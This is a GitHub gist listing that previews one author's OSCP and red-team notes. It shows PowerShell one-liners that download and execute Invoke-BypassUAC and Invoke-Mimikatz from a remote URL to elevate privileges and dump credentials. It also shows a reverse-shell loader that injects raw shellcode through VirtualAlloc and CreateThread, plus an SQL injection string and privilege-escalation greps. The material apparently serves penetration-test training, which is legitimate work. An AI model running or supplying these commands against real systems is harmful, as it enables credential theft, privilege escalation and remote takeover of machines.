Skip to content

Instantly share code, notes, and snippets.

View ssstonebraker's full-sized avatar

Steve Stonebraker ssstonebraker

62 followers · 40 following
View GitHub Profile
@ssstonebraker
ssstonebraker / aws_scripts.md
Last active March 29, 2021 18:44

List accounts in org

aws organizations list-accounts | grep arn | awk -F'/' '{ print $3 }' | awk -F'"' '{ print $1 }'
@ssstonebraker
ssstonebraker / Pentest-Service-Enumeration-Screenshots.md
Last active June 30, 2021 03:14

Basic Usage

To view basic usage just type:

pse

image

Listing commands for a service

pse
@ssstonebraker
ssstonebraker / OSCP_Post_Exploitation.md
Last active June 13, 2023 19:06

Pupy Post Exploitation Toolkit Notes

link to project home: https://github.com/n1nj4sec/pupy

Create aliases - modify pupy.conf

Modify pupy.conf Under the section starting with [aliases] you can add them

[aliases]
@ssstonebraker
ssstonebraker / OSCP_discovery.md
Last active June 13, 2023 19:06
@ssstonebraker
ssstonebraker / OSCP_Redteam_Powershell_Cheatsheet.md
Last active October 22, 2022 05:38

Description:

Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start     powershell.exe'"

Invoke-Mimikatz: Dump credentials from memory

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

Import Mimikatz Module to run further commands

@ssstonebraker
ssstonebraker / OSCP_Password_Cracking.md
Last active February 8, 2024 06:33

Hydra

Supported protocols

List1 list2 list3 list4 list5
asterisk icq oracle-listener rexec snmp
cisco imap[s] oracle-sid rlogin socks5
cisco-enable irc pcanywhere rpcap ssh
@ssstonebraker
ssstonebraker / OSCP_Privilege_Escalation.md
Last active January 21, 2022 07:47

Grep for files on disk

grep --binary-files=text -B 2 '99999:7' /dev/sda1
find / -maxdepth 2 -path '/proc' -prune -o -path '/dev' -prune -o -type f -exec grep "proof.txt" {} +

Docker privilege Escalation

@ssstonebraker
ssstonebraker / OSCP_Windows_Powershell_Reverse_Shell.ps1
Last active January 21, 2022 07:48
oscp windows powershell reverse shell
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]] $sc = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,
@ssstonebraker
ssstonebraker / OSCP_notes_brakertech.md
Last active December 12, 2022 14:13
OSCP Notes #oscp

Discovery

Tools

SQL Injection

' or '1' ='1' --

Website Directory Enumeration

@ssstonebraker
ssstonebraker / Active Directory Attacks.md
Last active April 5, 2024 02:26
Active Directory Attacks #oscp